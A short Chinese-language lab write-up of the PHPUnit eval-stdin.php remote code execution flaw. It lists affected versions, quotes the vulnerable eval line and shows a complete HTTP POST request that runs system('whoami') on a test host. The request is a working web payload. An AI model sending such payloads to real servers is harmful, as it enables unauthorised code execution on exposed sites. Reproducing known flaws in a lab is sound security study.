漏洞概述:
PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。
漏洞版本:
4.8.19 ~ 4.8.27
5.0.10 ~ 5.6.2
基本原理:
漏洞位于/phpunit/src/Util/PHP/eval-stdin.php
。
eval('?>'.file_get_contents('php://input'));
漏洞复现:
总体来说就是向
vendor/phpunit/src/Util/PHP/eval-stdin.php
发送POST请求执行php代码。
访问该路劲
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
抓包改为post方式
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: 192.168.239.129:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 18
<?php system('whoami');?>